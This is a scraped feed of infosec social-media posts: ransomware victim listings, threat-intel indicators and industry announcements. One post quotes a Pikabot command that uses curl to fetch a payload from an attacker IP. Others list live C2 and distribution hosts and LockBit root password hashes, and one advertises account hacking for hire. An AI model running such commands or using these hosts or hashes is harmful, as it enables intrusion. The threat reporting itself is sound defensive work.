#0day #CMSMadeSimple 2.2.19 Server-Side Template #Injection #Vulnerability 0day.today/exploit/descripti… -- inj3ct0r
#0day #Dotclear 2.29 Cross Site Scripting #Vulnerability #XSS 0day.today/exploit/descripti… -- inj3ct0r
#0day #SitePad 1.8.2 Cross Site Scripting #Vulnerability #XSS 0day.today/exploit/descripti… -- inj3ct0r
e84c050d38730a0bf098476cc6a167f9944521a0e4e1beedb2dab331a166fc52What's going on in the VT comments of this sample?🤔 -- malwrhunterteam
This is your reminder to register for our ATD training at SO-CON 2024! Course architect @v3r5ace shares what you can expect, including our detection engineering methodology & the role of detection engineering in a well-functioning SOC. ⬇️Learn more: ghst. -- specterops
We had a real chance at love. A mystery woman offered us $600/week. All we did is ask for the malware and she blocked us:( -- vxunderground
LockBit ransomware attacks continue.There is more work to do. -- alvieriD
Samples 👇bazaar.abuse.ch/sample/82f63…bazaar.abuse.ch/sample/d6788…bazaar.abuse.ch/sample/aedc7…bazaar.abuse.ch/sample/4552e… -- Cryptolaemus1
distrohttps://workstatpasing.]com/Nationwide_Serviceshttps://workstatpasing.]com/onmicrosoftc2'shttps://osakaimchk.]comhttps://carritosdelacompra.]comhttps://propertystats.]nethttps://www.erasnetwork.]euhttps://www.marioagozzino.]it(2/3) 👇 -- Cryptolaemus1
#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript invoice 22-2-2024.jswscript on.jsC:\Users\Admin\AppData\Local\Temp\npp.8.6.portable.x64\notepad.exe (sideload)👇\npp.8.6.portable.x64\plugins\mimeTools.dll(1/3) 👇IOC'sgithub.com/pr -- Cryptolaemus1
Has America tried turning DNS on and off again? Usually works for us. -- hackerfantastic
Now you'll be able to easily investigate further into your alerts that are triaged and escalated by the Autonomous SOC platform, securely interacting with risky websites in a virtual session. -- IntezerLabs
^That quick example of shows a phishing webpage loading in the virtual browsing session, to securely interact with the CAPTCHA and get to the page impersonating a Microsoft login screen to steal user credentials. -- IntezerLabs
Interactive Browsing is here!Less than 1 min to select the URL from your Ingested Alerts or History page, click to launch an interactive session, then start investigating and securely interacting with the website in a virtual browser.piped.video/watch?v=s -- IntezerLabs
Dear @mozilla You're getting to be just as bad as all the others #telemetry -- james_inthe_box
I cavi non si vedono 😅AudioQuest powerquest 505 😬 -- JAMESWT_MHT
"FLAT_MACHINERY": 4d3c94dea622c1bf3c203c6c558be9a95913a3e6f80b7881576dbb8a114335403.77.201[.]228 -- malwrhunterteam
🚨ONE WEEK LEFT to take advantage of special pricing for SO-CON 2024! Join us in Arlington, VA to discover cutting edge insights, learn comprehensive skills & network with industry peers. Learn more ➡️ specterops.io/so-con -- specterops
Reverse engineering of AES protected USB flash drivesExcellent research @matthiasdeegblog.syss.com/posts/hacking-…blog.syss.com/posts/hacking-…#hardware #infosec #aes -- 0xor0ne
For anyone interested in learning Windows binary reverse engineering, these are excellent resources by Alexandre Borges (@ale_sp_brazil)Article 01: exploitreversing.files.wordp…Article 02: exploitreversing.files.wordp…#infosec #windows -- 0xor0ne
Imagine key logging someone via their neural synapse before they even type the letter 🧠 🔐 -- bushidotoken
"I feel like people are sleeping on the blast radius of this. One server could have eighty or a hundred organizations managed for remote support." @kylehanslovan @huntressLabsCritical ScreenConnect Flaw Under Active Exploitation decipher.sc/critical-scree -- DecipherSec
Conspiracy Theorist Checklist:EMP ✅Obama ✅"Our Enemies" ✅Critical Infrastructure ✅ -- DrunkBinary
Always humbled to receive awards from @AV_Comparatives #whatateam kaspersky.com/blog/kaspersky… -- e_kaspersky
Akira #ransomware group has added PEER Consultants (peercpc.com) to their victim list.#USA#akira #cti #cyberattack #darkweb #databreach -- FalconFeedsio
😂 -- malwrhunterteam
Ultimate OSINT Resources dlvr.it/T36Mvl #OSINT #Medium -- osintbear
Group: qilinApprox. Time: 17:43 22/02/24Title: unique-relations.at -- RansomwareNews
Group: akiraApprox. Time: 16:48 22/02/24Title: Quik Pawn Shop -- RansomwareNews
Thank you for the recursive notifications, @Ichiki9137, @iluvwerewolves_, @Irontroll2, @Benito_Llan, @reenz0h, @Bob_Kelso_MD, @Sunwingg, @0x6D6172636F. You nerds are a bunch of jackasses, y'know that? -- vxunderground
Our latest episode of Beers with Talos is live now, covering all things #VoltTyphoon. Check out what we know about this threat actor, why they've been in the news recently, and advice for critical infrastructure defenders cs.co/6012nclPn -- talossecurity
Airbus robotics firm MTM Robotics allegedly breached by ThreeAm. @Airbus -- alvieriD
More details from the @TalosSecurity team on newly discovered Turla tooling. -- DecipherSec
When does the doomsaying start about the cellular outages start? Over/under on cyber attack blamed instead of BGP or DNS (or both)? -- DrunkBinary
ThreeAM #ransomware group has added 2 new victims to their #darkweb portal.-Abcor 🇦🇺-MTM Robotics 🇺🇸#Australia #USA#ThreeAM #cti #darkweb #databreach #cyberattack -- FalconFeedsio
Here's what he'll be covering: ✅ What is cyber warfare? How does it differ from “regular criminal cyber threats” in objectives or methods?✅ Recent examples of cyber warfare that hit private companies✅ How to protect your business against targeted or downs -- IntezerLabs
A number of recent Cyber Warfare attacks have hit private companies -- so how can you protect your business from becoming?Security researcher @MhicRoibin will dig in during this live webinar next week, register here 👉 👉 intezer.com/webinar-cyber-wa… -- IntezerLabs
Level Up Your CTI Game: Building Effective Production with Blueprints dlvr.it/T35zPR #OSINT #Medium -- osintbear
Today's the day! Join @Praga_Prag & @synth_nic0 as they discuss some of the techniques used by adversaries to gain & sustain access within a domain & discuss effective recovery strategies. There's still time to register ➡️ ghst.ly/3HE1wDl -- specterops
🌟New report out Monday 2/26 by @_pete_0, @malforsec & @r3nzsec 🌟The intrusion began with SEO poisoning, leading to a Gootloader infection.You'll see mentions of Cobalt Strike, SystemBC, Advanced IP Scanner, and more!Subscribe⬇️ -- TheDFIRReport
Maybe he thinks we've been in a coma -- vxunderground
-- vxunderground
Thank you, Sloth. This is a wonderful meme. -- vxunderground
LockBit affiliates tied to Evil Corp and FIN7, Carbon Spider (Sangria Tempest) Great reports @TrendMicro @PRODAFT -- alvieriD
Samples 👇bazaar.abuse.ch/sample/4c295…bazaar.abuse.ch/sample/89dc5… -- Cryptolaemus1
.dll distro103.124.105.]140/guJ/103.124.105.]147/KNaDVX/c2' config is all known see Github for info. -- Cryptolaemus1
#Pikabot - #TA577 - .zip > .js > curl > .exe#Signed - A.P.Hernandezwscript ION.jscmd /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfhcurl http://103.124.105.]147/KNaDVX/99.dat -o C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\jda.exe(1/3)👇IOC'sgithub.com/p -- Cryptolaemus1
This week's #OSINT #poll #questionHow can individuals protect their identity on the dark web?#reconnaissance #investigation #intelligence #tool #cybersecurity #infosec -- DailyOsint
Great thread and insight from @smoothimpact -- DrunkBinary
UserSec claims to have targeted multiple websites in Latvia alongside 22C, NoName057(16) , and the CyberArmy of Russia.#Latvia#ddos #cyberattack #cti #threatintel -- FalconFeedsio
ALPHV #ransomware group has added Hardeman County Community Health Center (hardemanhealth.org) to their victim list.#USA#alphv #cti #darkweb #cyberattack #databreach -- FalconFeedsio
Fenomenali... Allora esistono quelli come me che rispondono con il lanciafiamme😅🔥 -- JAMESWT_MHT
"Invoice-0673892.pdf.rar": 1bc736e09c1b739fe1d4fc95fc502d775daa90a3e0c26d5de66f9e67ac3c7257"Invoice-0673892.pdf.lnk": 49036e3800ba67ab63b09d3ac7e8f45230deca4ee0603b3786ca7d77ca347aa2Next stage (opendir): https://www.share-pdf-fast[.]com/invoice-0673@1ZRR4 -- malwrhunterteam
😂@JAMESWT_MHT -- malwrhunterteam
The Integration of AR Glasses for Investigating Blockchain Transactions dlvr.it/T35vfN #OSINT #Medium -- osintbear
Group: threeamApprox. Time: 13:40 22/02/24Title: mtmrobotics.com -- RansomwareNews
Group: threeamApprox. Time: 13:40 22/02/24Title: abcor.com.au -- RansomwareNews
Group: akiraApprox. Time: 13:40 22/02/24Title: PEER Consultants -- RansomwareNews
We have more information out now about the recent #Turla activity we've been tracking, including in-depth details about their command and control infrastructure cs.co/6016n9h1Q -- talossecurity
This week has been cool and badass.Let the speculation begin! -- vxunderground
Reports are surfacing that every large-scale cell phone provider in the United States is experiencing technical issues or outages this morning.apnews.com/article/cellular-… -- vxunderground
Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations | sentinelone.com/labs/unmaski…@LabsSentinel -- 780thC
Supervisory General Supply Specialist GG-12 w/ the @780thC, Ft. Meade, MD, responsible for overall management and accountability of supply, transportation, and logistics support function, as well as Facilities Manager duties. Open: Feb. 22 - Mar. 04, 2024 -- 780thC
BlackCat posts another nonprofit Federal Qualified Health Center.Hardeman County Community Health Center in Tennessee. @FBI -- alvieriD
Thank you, @Jane_0sint, for this amazing addition to #Cryptomalware👍Check out fresh info on #SilentCryptoMiner! -- anyrun_app
In @thor_scanner we can use external vars in #YARA rules to do things like this 👇 to detect suspicious new accounts in #SecureConnect@_JohnHammond's post x.com/_JohnHammond/status/17…THOR's external varsthor-manual.nextron-systems.…Rulesgithub.com/Neo23x0 -- cyb3rops
BlackBasta #ransomware group has added 6 new victims to their #darkweb portal. - ZircoDATA 🇦🇺- Dilweg 🇺🇸- Birchall Foodservice 🇬🇧- US Merchants 🇺🇸- Climatech 🇺🇸- Newman Ferrara 🇺🇸#USA #Australia #UK#BlackBasta #databreach #cyberattack #cti -- FalconFeedsio
feels like Windows95man is dedicated to @SwiftOnSecuritypiped.video/watch?v=Tf1NS1vE… -- Hexacorn
-- malwrhunterteam
Group: alphvApprox. Time: 11:36 22/02/24Title: Hardeman County Community Health Center -- RansomwareNews
ROKRAT북한지 기고문 (1).zipContribution to North Korea (1).zip29f494e0a66158a808b39299267c5c53이상용.lnkLee Sang-yong.lnkacf4085b2fa977fc1350f0ddc2710502#ROKRAT #APT37 #APT #IOC -- suyog41
We totally agree here! 🔥And if you still want to check some samples of #LockBit – here you go ➡️ any.run/malware-trends/lockb… -- anyrun_app
Akira #ransomware group has added 2 new victims to their #darkweb portal. -DTS 🇨🇱-Lancaster 🇺🇸#Chile#USA#akira #databreach #cyberattack #cti -- FalconFeedsio
Group: blackbastaApprox. Time: 09:37 22/02/24Title: New York Law Firm with a National Presence -- RansomwareNews
Group: blackbastaApprox. Time: 09:37 22/02/24Title: Climatech Inc -- RansomwareNews
Group: blackbastaApprox. Time: 09:37 22/02/24Title: US Merchants -- RansomwareNews
Group: blackbastaApprox. Time: 09:37 22/02/24Title: Birchall Foodservice -- RansomwareNews
Group: blackbastaApprox. Time: 09:37 22/02/24Title: Dilweg -- RansomwareNews
Group: blackbastaApprox. Time: 09:37 22/02/24Title: ZircoDATA -- RansomwareNews
In their latest blog post DCSO CyTec's Johann Aydinbas, Olivia Hayward, Jiro Minier & Kritika Roy look into a recent KONNI-backdoored Russian consular software installer. medium.com/@DCSO_CyTec/to-ru… -- virusbtn
Sucuri's Denis Sinegubko describes how threat actors have started using crypto drainers to monetize traffic to compromised sites, and investigates Wave 2, Angel Drainer and other recent variants of website hacks that involve crypto drainers. blog.sucuri.n -- virusbtn
Interesting reading on reversing a custom Instruction Set Architecture (ISA) using Binary Ninja (37C3 CTF)Credits Thomas Imbert (@Synacktiv)synacktiv.com/en/publication…#cybersecurity #reverseengineering #binaryninja -- 0xor0ne
🐧 Linux #malware is on the rise 📈And it's important to have a tool that helps analyze itSee how you can use #ANYRUN to efficiently detect and study:🔹 #Mirai botnet🔹 #Miners🔹 #DDoSLearn more ↘️ any.run/cybersecurity-blog/l…#Linux #Ubuntu #MalwareAnalysis -- anyrun_app
BianLian #ransomware group has added 2 new victims to their #darkweb portal. -March Construction-Human Resources Technologies, Inc #USA#BianLian #cyberattack #cti #databreach #threatintel -- FalconFeedsio
🤔😂 -- malwrhunterteam
As they promised, 4 updates are here:"Prodaft""Account Closures""Lockbit's new encryptor""Secureworks" -- malwrhunterteam
🚨🔥 Urgent Security Alert: The critical #ScreenConnect bug is now under active attack! Identified IoCs include:- 📍 IP 64.31.63.240 hosting SimpleHelp remote admin tool on port 443.- 📥 Scripts pulled from tmpfiles[.]org.-📍 IP 116.0.56.101:9191 in Pakistan 🇵 -- TLP_R3D
We've updated the vx-underground malware families collection- Kutaki- RogueRobin- zLoader- Qealler- QuasarRAT- RhadamanthysLoader- Ryuk- Stealc- Emotet- IcedId- VenomRAT- Glupteba- CactusRansomware- AsyncRAT- DarkBitRansomware- Amadey- Pikabot🫡🫡🫡 -- vxunderground
The sun is brutal -- 424f424f
ALPHV #ransomware group has added 2 new victims to their #darkweb portal. -Austen Consultants -KHS&S Contractors #USA#alphv #databreach #cyberattack #cti -- FalconFeedsio
We've updated the vx-underground Windows malware paper collection- 2024-01-24 - How to perform a Complete Process Hollowing- 2024-02-02 - Bypassing EDRs With EDR-Preloading- 2024-02-16 - Beyond Process and Object Callbacks - An Unconventional Method -- vxunderground
LockBit is getting destroyed and BlackCat is taunting & lying to another victim.[!] “Law enforcement will not help you.” Please notice the [!] -- alvieriD
The OSINT-ification of ISIS on the Dark Web dlvr.it/T34n3B #OSINT #Medium -- osintbear
Group: alphvApprox. Time: 02:47 22/02/24Title: Worthen Industries [We're giving you one last chance to save your business] -- RansomwareNews
例えば、大きめの組織では情シスはOA屋になり、生産管理は現場部門が委託先に依頼することが多い主たるリスクは主業を支える生産管理側にあるのに、セキュリティ対策は情シスが推進する責務を負いOA範囲だけを対象にしているから、最大リスクの生産管理側が放置される構造問題を解消すべき、とか -- 58_158_177_102
経営が知識として欠けている分野において、経営が判断すべき組織や方針の不合理や問題に対するナレッジの提供(戦略)と、経営が知識として欠けているが故に担当の献策・施策・業務内容を理解できずビジネスリスクを生じさせないためのナレッジの提供(戦術)の双方が必要ではないかと -- 58_158_177_102
本当に現場に必要なサイバーセキュリティ経営ガイドラインは何か、昨日の打ち合わせからまた考えはじめた -- 58_158_177_102
朝の宣伝メールAD攻撃乗っ取られたら大変←わかるADの攻撃は検知や判断が困難←わかるだから対策が必要です←わかるそこでE5の購入!←わかりたくない自分の製品の安全対策を標準化せず、むしろ人質にして利用者からお金をせびるビジネスモデルよ。。。 -- 58_158_177_102
Nice Hunt @malwrhunterteam I guess the backdoor is here -> pycryptoenv\__init__.py -> crypt() func. So i guess the actor will first install this backdoor python module and drop some script to run it.But it's really weriod.And seems we won't know the key. -- ShadowChasing1
Exciting times for KryptoCTI itdigest.com/information-com… -- TLP_R3D
This Threat Brief addresses two High and Critical vulns exploiting ConnectWise’s #ScreenWise remote desktop app. It spans attack scope to mitigations and incorporates our unique observations. bit.ly/49pfncK -- unit42_intel
ICYMI: There was also an update on the ICBC attack that LockBit was responsible for from the US Treasury:home.treasury.gov/news/press… -- bushidotoken
454eca9cfb994ac090dc6dfdd5843594059291d8e6cbe04cf864a68e2525a300"All your files have been encrypted and trampled by the serial killer."😂 -- malwrhunterteam
Earlier we spoke with ALPHV ransomware group. We asked their opinion on the recent takedown of the Lockbit ransomware group website.ALPHV, their long time competitor, offered words of encouragement for their competitor. They said and quote: "Lockbit is a -- vxunderground
tl;dr mfw -- vxunderground
Today we spoke with Lockbit ransomware group administrative staff regarding the recent arrests of their affiliates. Lockbit administration told us several things.1. They assert the individuals arrested are the wrong people and the multi-agencies involved -- vxunderground
The 2 new entries:"Rewards for Reporting""FR arrest warrants"The updated entries:"Arrest in Poland""Activity in Ukraine" -- malwrhunterteam
Update: the "Cronos Task Force" added 2 new entries and updated 2 previously added entries on their version of the LockBit blog. -- malwrhunterteam
So, @lazy_daemon looked at it: nitter.net/lazy_daemon/stat…. In short: interesting lure/targeting/techniques, with a boring payload (NetSupport RAT).But that the payload itself is boring not means the C2 IPs can't be interesting:40.124.123[.]4 - Microsoft -- malwrhunterteam
😂 -- malwrhunterteam
Group: lockbit3Approx. Time: 20:33 21/02/24Title: FR arrest warrants -- RansomwareNews
Group: alphvApprox. Time: 20:33 21/02/24Title: KHSS (You have 3 days) -- RansomwareNews
SCCM sites configured to support high availability can be abused to compromise the entire hierarchy. @garrfoster digs into this in our new blog post. ⬇️ ghst.ly/3SLZAOe -- specterops
Get the scoop on SCCM research! Join the #sccm channel in the BloodHound Gang Slack: ghst.ly/BHSlack -- specterops
2024-02-21 (Wednesday): Site with #ParrotTDS redirects to #SocGholishfake browser update page. SocGholish payload installs #AsyncRAT. Listof indicators at bit.ly/3uDU3Bl#Unit42ThreatIntel #TimelyThreatIntel #InfectionTraffic #Wireshark #Malware -- unit42_intel
We now have an autograph from Mikhail Matveev, FBI most wanted and now we have shit post from FBI.We have both sides of the coin -- vxunderground
The official account of the Embassy of the Republic of Poland in Kuala Lumpur got pwned & was used to spread scam. And obviously as it is a government related account, it has a gray checkmark.The account is in partially recovered state now... -- malwrhunterteam
Today Poland's CBZC (Centralne Biuro Zwalczania Cyberprzestępczości, Central Bureau for Combating Cybercrime) released footage of a Lockbit affiliate arrest. -- vxunderground
The Lockbit Rewards for Justice Telegram is even memeing Lockbit 😭😭😭😭😭*Lockbit ransomware group communication channels are labeled "LockbitSupp" -- vxunderground
Today the United States government, or UK government, or EUROPOL, ... whoever is administrating the Lockbit blog... announced there is now a reward up to $10,000,000 for the identification of leadership behind Lockbit ransomwareAffiliates are worth up to -- vxunderground
Today the Ukraine police announced they have arrested a Father-and-Son duo who were Lockbit affiliates.More information: npu.gov.ua/news/slidchi-nats… -- vxunderground
Today we decided to write to the FBI on Telegram. They sent us a kitty.This will now be framed and placed on the wall. -- vxunderground
vmlinux-to-elf: useful tool for converting vmlinux/vmlinuz/bzImage/zImage kernel images to and ELF file that can be analyzed with IDA and Ghidra.github.com/marin-m/vmlinux-t…#Linux #reverseengineering -- 0xor0ne
-- bushidotoken
Never ordering the salad again. -- hackerfantastic
1:0:99999:7::: - for the copy and paste nerd in you. I extracted these hashes with OCR and then manually reviewed them from images taken off "core" and "blog" onion leak. I was hoping for a weak password or something entertaining, hashcat doesn't support -- hackerfantastic
root:$y$j9T$0OPwc6tVnXEy6qnfHeeQV/$2wOqKaAXCbR.dzM9T.nZRHPRcIm/XW64r59pSPiFlr7:19157:0:99999:7:::root:$y$j9T$WhpM68WtRWalIYvNjEcYR.$LUIE5rdqvpbCa0g2RBRcBRo9zKib9rhi86b7y.f08w1:19141:0:99999:7:::user:$y$j9T$Vo6FwASemarqwX.Y6xWqC0$.oh6ar51OqCahBVZvx2Y3AKniU -- hackerfantastic
I can't be the only one wondering what LockBit's root passwords were? I used OCR to extract these then manually verified them from images on the leaked site. They are seemingly valid Linux "yescrypt" hashes with unique salts. I tried only on a CPU with wo -- hackerfantastic
#0day #WordPress 6.4.3 Username Disclosure #Vulnerability 0day.today/exploit/descripti… -- inj3ct0r
#0day #WEBIGniter v28.7.23 - Stored Cross Site Scripting #Vulnerability #XSS 0day.today/exploit/descripti… -- inj3ct0r
#0day #OpenOLAT 18.1.5 Cross Site Scripting / #PrivilegeEscalation #Vulnerabilities #XSS 0day.today/exploit/descripti… -- inj3ct0r
#0day #IvantiConnectSecure Unauthenticated Remote Code Execution #Exploit #RCE 0day.today/exploit/descripti… -- inj3ct0r
Did you know utilities such as fdisk, dd, mount, etc are "illegal & dangerous"?😂 -- malwrhunterteam
Maximizing Efficiency and Precision: The Benefits of IP Ninja’s Subdomain Enumeration API dlvr.it/T33kgV #OSINT #Medium -- osintbear
Group: akiraApprox. Time: 16:43 21/02/24Title: Lancaster -- RansomwareNews
Group: akiraApprox. Time: 16:43 21/02/24Title: Desarrollo De Tecnol ogia y Sistemas Ltda -- RansomwareNews
Group: lockbit3Approx. Time: 16:43 21/02/24Title: Rewards for Reporting -- RansomwareNews
Excellent series by @Ahm3d_H3sham on PE file format internals0xrick.github.io/win-interna…0xrick.github.io/win-interna…0xrick.github.io/win-interna…0xrick.github.io/win-interna…0xrick.github.io/win-interna…0xrick.github.io/win-interna…0xrick.github.io/win -- 0xor0ne
...not to mention a unique hoodie only presented to members of the team – are additional advantages."Ubique Et Semper In Pugna"“Everywhere and Always… In The Fight!” -- 780thC
However, the benefits of camaraderie, culture, and skill craft – other trains of thoughts outside of ongoing operations – and representing the Brigade, Army Cyber, and the United States Army; 3/4 -- 780thC
CTF team members will be objectively assessed with the goal of ten primary members and ten alternates. The primary purpose behind the CTF team is outreach and engagement and all team members must understand they are publicly representing and promoting the -- 780thC
Calling all Praetorians!The Brigade is standing up a competitive Capture the Flag Team consisting of Praetorian Soldiers, warrant officers, officers, and Civilian personnel with the target of competing in remote or in-person event(s). 1/4 -- 780thC
Critical ScreenConnect Flaw Under Active Exploitation decipher.sc/critical-screenc… #decipher #deciphersec -- DecipherSec
Hahahaha -- DrunkBinary
"nsalbaniahack"😂Looking at the IP 88.119.174[.]102, you can find more interesting domains like vsliveagent[.]com (to which extensionlog[.]com is related) or xboxplayservice[.]com.Maybe @Namecheap would do some cleaning... -- malwrhunterteam
First "secur32.dll" is related to cashcloudservices[.]com, from that we can find "bringthemhomenow\.zip": fc95b67fa0664bf2d542f07120a3b51d47ff8eb55a94d00e16827eea26483206 -- malwrhunterteam
"secur32.dll": 720afa3e1216a9eb68b66858d50de0326f52afa279ef9ee0521aee98b312382f"secur32.dll": 90fa29cc98be1d715df26d22079bdb8ce1d1fd3ce6a4efb39a4c192134e01020"Quizora.exe": 23f6cefdce551431675506cb1c438feb2c66d38d1c77ebefe0fd5042e677ff80 -- malwrhunterteam
"W.rar": c44e315c93b669dbd953710c36dc1d532e27e74fd3b93a1dcbcd112323440751🤔@ShadowChasing1 @h2jazi @cyb3rops -- malwrhunterteam
"FastNFitnessC.apk", a Gravity RAT sample seen from Pakistan: 0223dbaed92ebed13f4e7176462127f7d8d75cc1c8c8c60d0145c043006317d6 -- malwrhunterteam
There's also "pycryptoenv-1.0.7.tar.gz": b4a04b450bb7cae5ea578e79ae9d0f203711c18c3f3a6de9900d2bdfaa4e7f67From: https://files.pythonhosted[.]org/packages/c1/07/e5a8ee9d65be100311340f442894587504d5a71b5d62d1eb5690badb65a5/pycryptoenv-1.0.7.tar.gz -- malwrhunterteam
Herramientas OSINT con Kali Linux & Windows— DetectDee, ExifTool, Foca dlvr.it/T33SNW #OSINT #Medium -- osintbear
Group: bianlianApprox. Time: 15:41 21/02/24Title: HRTec Inc -- RansomwareNews
Group: bianlianApprox. Time: 15:41 21/02/24Title: Marchassociates -- RansomwareNews
Group: alphvApprox. Time: 14:44 21/02/24Title: Austen Consultants -- RansomwareNews
If you're working on new research, or have a hot topic to discuss, now's the time to submit a presentation proposal for #VB2024 for a chance to share your work with fellow IT security professionals from around the world. #InfoSec #CyberSecurity virusbulle -- virusbtn
No fear.“We want our money.” -- alvieriD
📌 Attackers are using a link to #SMB share in emails to bypass the warning message about running a potentially malicious file⚙️ See the details: ⚙️ Downloaded #Pikabot signed by revoked #certificate ➡️ app.any.run/tasks/478732bb-b…🛰️ More samples and #IOC -- anyrun_app
If you want to search for ICS in Shodan,ICSRank, database of queries to search for internet connected ICS devices in search engines like Google, Shodan, Censys.icsrank.com@alhasawi#OSINT #intelligence #investigation #reconnaissance #cybersecurity #infosec -- DailyOsint
BlackBasta #ransomware group has added DasTeam Ag (dasteam.ch) to their victim list.#Switzerland#BlackBasta #cti #darkweb #databreach #cyberattack -- FalconFeedsio
I'm in court checking in on the Craig Wright 'Bitcoin inventor trial'. It's the most complex hearing I've ever been to. We just sat in silence for ages whilst a witness starred at an obscure piece of Bitcoin code. Such a tough trial as so few actually und -- joetidy
"pycryptoenv-1.0.7-py3-none-any.whl": c56c94e21913b2df4be293001da84c3bb20badf823ccf5b6a396f5f49df5efffFrom: https://files.pythonhosted[.]org/packages/55/05/ea24c62360099e185cd90d73f95e7f0d9346d4522b40e95f7563534cff58/pycryptoenv-1.0.7-py3-none-any.whl🤔@Sh -- malwrhunterteam
What CVSS 4.0 does (and doesn't) change about the way we view vulnerability severity cs.co/6011nbSgR -- talossecurity
Pelmeni Wrapper: New Wrapper of Kazuar (Turla Backdoor) | Turla is an APT group allegedly linked to the intelligence service FSB (Federal Security Service) from the Russian Federation. lab52.io/blog/pelmeni-wrappe… @LAB52io -- 780thC
U.S. Indictment Charges Two Russian Nationals with Attacks Against Multiple U.S. and International Victims; FBI Seizes Infrastructure; and Department of Treasury Takes Additional Action Against LockBit | justice.gov/opa/pr/us-and-uk… @TheJusticeDept -- 780thC
ESET: Operation Texonto is a disinformation/PSYOP campaign using spam mails as the main distribution method. welivesecurity.com/en/eset-r… @ESET -- 780thC
Budget Analyst GG-12 w/ the 781st MI Battalion (Cyber), @780thC, Ft. Meade, MD, responsible for performing budget formulation, execution, financial reconciliations, and management of budget and management programs. Open: Feb. 21 to Mar. 01, 2024, usajobs. -- 780thC
☝️ Unlike stealers or ransomware, #Cryptomalware doesn't corrupt files or steal dataInstead, parasitic threats like #XMRig drain system resources. Discover this threat type and how to identify its activity with #ANYRUN.Learn more ↘️ any.run/cybersecurity- -- anyrun_app
A new newsletter is out! Shorter than usual because I couldn't take my eyes of that beautiful work of art currently on LockBit's site 🤣mastodon.social/@campuscodi/… -- campuscodi
NoName continued the joint cyber attack on Japanese websites, assisted by the Russian cyber army, CyberDragon, 22C, and UserSec. -New Chitose Airport-City of Nagoya #Japan#ddos #cti #cyberattack #threatintel -- FalconFeedsio
ThreeAM #ransomware group has added Doneff Companies (doneff.com) to their victim list. #USA#ThreeAM #darkweb #cyberattack #cti #databreach -- FalconFeedsio
Car Loan Qualifications: A Complete Guide dlvr.it/T3306H #OSINT #Medium -- osintbear
Group: blackbastaApprox. Time: 11:43 21/02/24Title: [EN] -- RansomwareNews
Python Stealerafe44e5dda35569e140a3efb397c1262#PythonStealer #Stealer #IOC -- suyog41
Spock Stealer0d53d8859c853f6bd0a0b3d0393823cd#SpockStealer #Stealer #IOC -- suyog41
2024 unit42 incident response reportgithub.com/blackorbird/APT_R… -- blackorbird
Code injection or backdoor: A new look at Ivanti’s CVE-2021-44529labs.greynoise.io/grimoire/2… -- cyb3rops
Just dropping these screenshots for you to figure out which company did the right thing and which one missed the mark#ConnectWise -- cyb3rops
8BASE #ransomware has added 3 new victims to their #darkweb portal.- Acies Srl 🇮🇹- Axel Johnson 🇸🇪- Helical Technology 🇬🇧#Italy #Sweden #UK#DeepWeb #CyberRisk #8base #CTI -- FalconFeedsio
MEOW #ransomware group has added River Delta Unified School District to their victim list.#USA#ransomware #databreach #cyberattack -- FalconFeedsio
Offerta Speciale Super Saldi -- JAMESWT_MHT
"Invio Ordine accompagnatorio" spam emailspread #AgentTeslaEml>IMG>BatSamples + tag old samples + huntingbazaar.abuse.ch/browse/tag/f…Exfilftp.lemendoza[.comadmini@lemendoza[.com -- JAMESWT_MHT
Huge turn out at the Royal Courts of Justice in support for Julian Assange. They’ve built a stage with live music and speakers. Not seen it like this ever and covered cases on and off here for years. -- joetidy
Trustwave SpiderLabs’ Email Security team write about the Tycoon Group phishing-as-a-service (PaaS) framework. Its key selling features include the ability to bypass Microsoft two-factor authentication & leveraging Cloudflare to evade antibot measures. tr -- virusbtn
Cisco Talos researchers look into recent malware campaigns in which Google Cloud Run was abused. The highest volume campaigns were being used to deliver the Astaroth, Mekotio & Ousaban banking trojans to victims largely located in Latin American countries -- virusbtn
strange ways emproyees can ( accidently ) expose data bit.ly/3M633Dj #DataSecurity #Privacy #100DaysOfCode #CloudSecurity #Machine Learning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection #DataBreach #Hacked #Infosec !! #euro -- BAWAHACKS
#CyberAlerts Cofense Intelligence uncovers an advanced campaign in the Oil and Gas industry, deploying the sophisticated Rhadamanthys Stealer. Read More: cybermaterial.com/oil-and-ga…#Malware #Stealer #OilandGas #Infostealer #Phishing -- Cybermaterial_
Hablemos de... Ciberseguridad 🔐💻🔐#Ciberseguridad #phishing #CyberSecurity -- dacmosgroup
Text me now for any hacking or bypass Active 24/7#anyomous#sadapwhatsapphack #hackinstagrammurah#facebook #hackerstayaway #hackingout#accounthacking #mobilehacking #hackgmail#hacksnapchat #blackhathacker #hackerindia #phishing #Phish #Hackedgmail -- Ethical_hackz1
🎣 Do you know the common pitfalls that could compromise your email security? Dive into this essential guide revealing actionable dos and don'ts for a bulletproof strategy: hubs.la/Q02lZ3yg0#IRONSCALES #emailsecurity #phishing -- IRONSCALES
强制密码过期是有助于还是损害您的密码安全性? #DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cyber​​security #Cyber​​Attack #DataProtection#DataBreach #Hacked #Infosec -- jerrysmithhackz
strange ways emproyees can ( accidently ) expose data bit.ly/3M633Dj #DataSecurity #Privacy #100DaysOfCode #CloudSecurity #Machine Learning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection #DataBreach #Hacked #Infosec !! #euro -- jerrysmithhackz
Employees are the main targets of phishing attacks, which can lead to serious compliance concerns when PII and other sensitive information is exposed. Contact us today!#compliance #phishing #compliancetraining #MatadorNetworks -- matadornetworks
Ransomware associated with LockBit still spreading 2 days after server takedown buff.ly/3wk63rZ#DataSecurity #Privacy #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- rtehrani
Investigador, profesor, tecnólogo, estudiante: los programas y proyectos #CTI son una oportunidad para aportar a #Cuba desde la Ciencia y la Innovación. Infórmate con @citmacuba en redes sociales y en las delegaciones territoriales por toda #Cuba #GenteQu -- ArmandoRguezB
Hunters International Ransomware Victim: Avianor Aircraft - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
Hunters International Ransomware Victim: Builders Hardware and Hollow Metal, Inc[.] - redpacketsecurity.com/hunter…#HuntersInternational, #darkweb, #databreach, #ransomware, #threatintel, #tor -- RedPacketSec
